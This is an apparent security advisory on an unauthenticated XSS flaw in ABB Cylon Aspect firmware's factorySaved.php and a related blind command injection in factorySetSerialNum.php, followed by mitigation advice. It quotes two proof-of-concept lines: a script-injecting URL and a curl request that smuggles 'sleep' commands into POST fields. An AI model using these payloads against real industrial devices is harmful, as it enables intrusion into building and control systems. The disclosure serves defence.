Unauthenticated XSS Vulnerability in ABB Cylon Aspect 4.00.00

A critical unauthenticated Cross-Site Scripting (XSS) vulnerability has been identified in ABB Cylon Aspect firmware version 4.00.00, specifically affecting the factorySaved.php script. This flaw, discovered by researcher Gjoko Krstic (LiquidWorm), allows attackers to inject arbitrary JavaScript via the title GET parameter without authentication. The vulnerability primarily impacts devices during the manufacturing phase, though improper cleanup of test scripts post-deployment could extend the attack window.

Technical Overview

The vulnerability stems from insufficient input sanitization in the factorySaved.php script, which is typically used during device manufacturing. Attackers can craft a malicious URL containing JavaScript payloads in the title parameter, as demonstrated in the Proof of Concept (PoC):

http://192.168.73.31/factorySaved.php?title=<script>console.log('ZSL')</script>

Affected products include ABB’s NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, and ASPECT-Studio running firmware versions ≤4.00.00. While ABB has declined to patch this issue—citing its limited exploitability post-manufacturing—the presence of such scripts in deployed environments remains a concern.

Additional Vulnerabilities

Research by Zero Science Lab also uncovered a related Remote Code Execution (RCE) flaw in factorySetSerialNum.php, exploitable via blind command injection in the serial and ManufactureDate POST parameters. The PoC for this vulnerability involves:

curl http://192.168.73.31/factorySetSerialNum.php -d "serial=;sleep 2&ManufactureDate=;sleep 3"

Historical vulnerabilities in ABB Cylon Aspect 3.08.02, including unauthenticated command execution via deployStart.php and authenticated path traversal in ethernetUpdate.php, suggest a pattern of insufficient security controls in factory scripts.

Mitigation and Relevance

Organizations using ABB Cylon Aspect devices should:

Verify that all factory test scripts (e.g., factorySaved.php) are removed post-deployment
Monitor network traffic for attempts to access these scripts
Segment manufacturing networks from production environments

This vulnerability is particularly relevant for industrial control system (ICS) environments where ABB devices are commonly deployed. The unauthenticated nature of the XSS flaw could facilitate initial access for more severe attacks if test scripts remain accessible.

Conclusion

The ABB Cylon Aspect vulnerabilities highlight persistent risks in industrial device manufacturing workflows. While the immediate impact is limited to specific phases of device lifecycle, improper handling of test scripts could expose critical infrastructure to exploitation. Organizations should conduct thorough audits of ABB device configurations and apply compensating controls where patches are unavailable.